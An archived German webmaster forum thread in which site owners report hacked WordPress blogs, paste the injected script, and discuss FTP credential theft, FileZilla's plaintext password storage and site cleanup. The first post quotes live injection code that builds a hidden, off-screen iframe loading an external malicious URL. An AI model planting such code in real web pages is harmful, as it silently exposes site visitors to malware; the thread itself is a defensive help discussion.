Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Problem mit Wordpress

Informationen & SEO Tipps zum Einsatz und Verwendung von Blog-, Wiki und Content Management Systemen wie Drupal, Typo3, Wordpress, Reddot, Joomla, Moin Moin, phpWiki sowie Shop-Systemen wie z.B. XT-Commerce, Magento, ePages, Intershop, 1&1 Shops.
Neues Thema Antworten
swiat
PostRank 10
PostRank 10
Beiträge: 6202
Registriert: 25.02.2005, 23:56

Beitrag von swiat » 27.06.2012, 09:19

Hallo,

habe ein Problem mit meinem AVZ:

www.artikelschleuder.de

Gestern funktionierten noch alle Unterseiten, Tagseiten und auch die Artikelseiten, seit heute geht keine Unterseite mehr.

Seit einigen Tagen gibt es eine neue Version von Wordpress, eben ein Update gemacht, Unterseiten funktionieren nicht.

Habe im Quelltext das gefunden:
<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'https://fontana-euronics.com/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script>
Der Shop in dem Script war plötzlich an Stelle des Zugangs zum Admin da, bei einem weiteren Versuch ging der Login.

Was kann hier das Problem sein?

Wie kann man dieses Script entfernen?

Gruss
Kostenlose Backlinks: Hier lang <<<

Anzeige von ABAKUS

von Anzeige von ABAKUS »


Hochwertiger Linkaufbau bei ABAKUS:
  • Google-konformer Linkaufbau
  • nachhaltiges Ranking
  • Linkbuilding Angebote zu fairen Preisen
  • internationale Backlinks
Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0

swiat
PostRank 10
PostRank 10
Beiträge: 6202
Registriert: 25.02.2005, 23:56

Beitrag von swiat » 27.06.2012, 09:26

Das Script befindet sich noch auf zwei anderen Seiten (Kein Wordpress). :x
Kostenlose Backlinks: Hier lang <<<

MonikaTS
PostRank 10
PostRank 10
Beiträge: 3582
Registriert: 07.10.2005, 09:05

Beitrag von MonikaTS » 27.06.2012, 09:45

1. hast du die Permalinks erneuert ?

2. Passwörter zu FTP +Domainverwaltung ändern, gleich, nicht erst Morgen


+++++++++++
3. sind alle Domains auf dem selben FTP?

4, wenn das alles so ist => gehackt , aus Maus, alles jungfräulich frisch machen , wenn du bei WP damit Probleme hast oder nicht weißt wie es bis ins kleinste Tüpfelchen geht, kannst mich ruhig via PN kontaktieren,

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


swiat
PostRank 10
PostRank 10
Beiträge: 6202
Registriert: 25.02.2005, 23:56

Beitrag von swiat » 27.06.2012, 09:55

MonikaTS hat geschrieben:1. hast du die Permalinks erneuert ?

2. Passwörter zu FTP +Domainverwaltung ändern, gleich, nicht erst Morgen


+++++++++++
3. sind alle Domains auf dem selben FTP?

4, wenn das alles so ist => gehackt , aus Maus, alles jungfräulich frisch machen , wenn du bei WP damit Probleme hast oder nicht weißt wie es bis ins kleinste Tüpfelchen geht, kannst mich ruhig via PN kontaktieren,
Permalinks nicht geändert.

Werde gleich das FTP Pw ändern, ja auf diesem Webspace haben alle Domains den gleichen FTP Zugang.

Trifft wohl Punkt 4

:(

Danke für deine Info.

Gruss
Kostenlose Backlinks: Hier lang <<<

ThatsLife
PostRank 6
PostRank 6
Beiträge: 448
Registriert: 24.12.2011, 00:09

Beitrag von ThatsLife » 27.06.2012, 10:04

Kannst du mal eine Auflistung deiner Plugins und Theme(s) machen?

weltweit
PostRank 4
PostRank 4
Beiträge: 158
Registriert: 21.06.2003, 20:31

Beitrag von weltweit » 27.06.2012, 12:40

Fast alle unsere Blogs sind heute ebenfalls gehackt - der Code ist der gleiche wie oben schon gepostet.

Hat schon jemand etwas herausgefunden?

Das sind unsere Plugins:
Akismet
cbnet Ping Optimizer
Fixed Size of Uploaded Images & No Thumbnails
Get Recent Comments
Sociable Zyblog Edition
Target Blank In Posts And Comments
the_excerpt Reloaded

weltweit
PostRank 4
PostRank 4
Beiträge: 158
Registriert: 21.06.2003, 20:31

Beitrag von weltweit » 27.06.2012, 15:30

und - keine hat eine Idee zur Vermeidung in Zukunft oder Lösungsansätze?

Wir können uns immer noch nicht ganz erklären, wie es dazu kommen konnte.
Es wurden viele unserer Blogs und Seiten gehackt, was auf einen keylogger oder etwas ähnliches hindeutet, daß FTP-Passwörter ermittelt (wir arbeiten mit filezilla).

ABER was dagegen spricht: es sind eben nicht alle unsere Seiten und Blogs betroffen. Vor Jahren hatten wir schon mal so einen Keylogger und damals waren wirklich ALLE Seiten betroffen.

Momentan sind wir dabei, alle FTP-Passwörter zu ändern und die Daten neu hochzuladen, jedoch würden wir den ganzen Vorgang gerne auch besser verstehen, um in Zukunft sowas zu verhindern.

Es kann auch nicht an einer veralteten Wordpress-Version gelegen haben, denn auch unser ganz neuen Blog mit neuester Version ist betroffen.

swiat
PostRank 10
PostRank 10
Beiträge: 6202
Registriert: 25.02.2005, 23:56

Beitrag von swiat » 27.06.2012, 16:55

Ich denke Wordpress ist generell ziemlich gefährdet einem Hacker zum Opfer zu fallen, auch wenn öfter neue Updates eingespielt werden.

Hier meine Plugins:

Adminimize
Akismet (deaktiviert)
All in One SEO Pack
Antispam
Draft Notifier
Google XML Sitemaps
Hello Dolly
Nofollow Case by Case
Register Plus
WP-PostRatings
WP-PostViews
WP-Stats
WP-UserOnline
WP Pending Post Notifier Plus
WP Permalauts

Das Script wurde unter anderem in einer htaccess hinterlegt, bzw mit hinzugefügt.

Gruss
Kostenlose Backlinks: Hier lang <<<

MonikaTS
PostRank 10
PostRank 10
Beiträge: 3582
Registriert: 07.10.2005, 09:05

Beitrag von MonikaTS » 27.06.2012, 20:43

nee WP ist nicht hacker anfälliger als andere

immerhin verwenden mehr als 50% aller Websites, die ein CMS verwenden WP

meist liegt der Grund eines Hackangriffs an leicht erfassbaren Passwörtern, das schreib ich nicht so gern ist aber so


wäre nur WP gehackt gewesen, dann hätt es deine anderen Seiten nicht erwischt, es wurde der ftp gehackt,

nur wer die Lücke richtig erkennt, kann sie gut genug sichern,

swiat
PostRank 10
PostRank 10
Beiträge: 6202
Registriert: 25.02.2005, 23:56

Beitrag von swiat » 27.06.2012, 21:15

MonikaTS hat geschrieben:

wäre nur WP gehackt gewesen, dann hätt es deine anderen Seiten nicht erwischt, es wurde der ftp gehackt,

nur wer die Lücke richtig erkennt, kann sie gut genug sichern,
Hab jetzt das Pw für FTP abgeändert.

Könnte der Hack mit einer alten Version von Filezilla zusammen hängen?

Ich bin immer etwas faul mit den ganzen Updates..... :-?

Gruss
Kostenlose Backlinks: Hier lang <<<

ThatsLife
PostRank 6
PostRank 6
Beiträge: 448
Registriert: 24.12.2011, 00:09

Beitrag von ThatsLife » 27.06.2012, 21:16

Hast du deinen Rechner schon komplett durchgecheckt?

Vegas
PostRank 10
PostRank 10
Beiträge: 5063
Registriert: 27.10.2007, 13:07

Beitrag von Vegas » 27.06.2012, 21:57

Das Problem mit Filezilla ist, daß eine Art History im Klartext gespeichert wird, solange man es in Standardeinstellung betreibt. Liest irgendwelche Malware die ungeschützte Datei aus, hast Du den Salat.
Forward Up >> Suchmaschinenoptimierung >> SEO Notaufnahme >> SEO Audits >> SEM >> ORM

jabbadu
PostRank 6
PostRank 6
Beiträge: 453
Registriert: 25.06.2012, 07:48
Wohnort: Bielefeld

Beitrag von jabbadu » 28.06.2012, 07:45

Ja Filezilla ist sehr anfällig..

Man kann die ganzen Servereinstellungen auch einfach per XML exportieren, da werden dann die PW und Zugänge schön säuberlich abgelichtet..
Aber an einer alten Version kann es eigentlich nicht liegen.

CubeMaster
PostRank 7
PostRank 7
Beiträge: 547
Registriert: 15.12.2004, 21:21

Beitrag von CubeMaster » 28.06.2012, 09:29

jabbadu hat geschrieben:Ja Filezilla ist sehr anfällig..

Man kann die ganzen Servereinstellungen auch einfach per XML exportieren, da werden dann die PW und Zugänge schön säuberlich abgelichtet..
Aber an einer alten Version kann es eigentlich nicht liegen.
Darf ich fragen, wie du das mit Filezilla und den Zugangsdaten genau machst? Ich habe in den Einstellungen nämlich nur angkreuzt "Passwörter nicht speichern"

swiat
PostRank 10
PostRank 10
Beiträge: 6202
Registriert: 25.02.2005, 23:56

Beitrag von swiat » 28.06.2012, 15:16

Hab die Seite jetzt in der Nacht neu eingerichtet, funktioniert wieder.

Alle Artikel wieder online.
Hast du deinen Rechner schon komplett durchgecheckt?
Werde ich noch machen.

Internet läuft bei mir fast nur über dieses Tool:

www.sandboxie.com

Trotzdem kann natürlich was drauf sein.

Gruss
Kostenlose Backlinks: Hier lang <<<

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag